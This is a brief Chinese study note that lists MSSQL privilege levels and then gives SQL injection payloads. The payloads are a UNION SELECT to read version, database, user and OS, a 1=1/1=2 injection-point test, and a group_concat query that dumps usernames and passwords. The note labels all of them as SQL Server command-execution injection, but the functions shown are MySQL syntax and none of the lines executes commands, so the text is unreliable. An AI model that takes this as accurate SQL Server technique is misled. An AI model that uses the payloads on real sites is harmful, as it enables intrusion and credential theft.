1. mssql权限

• sa权限：数据库操作，文件管理，命令执行，注册表读取等system。是mssql的最高权限

• db权限：文件管理，数据库操作等 users-administrators

• public权限：数据库操作 guest-users

2、sql server注入执行命令

查询数据库版本，数据库名字，用户名，操作系统

select * from member where id=-1 union select version(),database(),user(),@@version_compile_os;//sql server注入执行命令

判断注入点—报错查询

select * from member where id=1 and 1=1;select * from member where id=1 and 1=2;//sql server注入执行命令

group_concat 查询

将查询的内容连在一起，列如:

select group_concat(username,pw) from  member where id=1;//sql server注入执行命令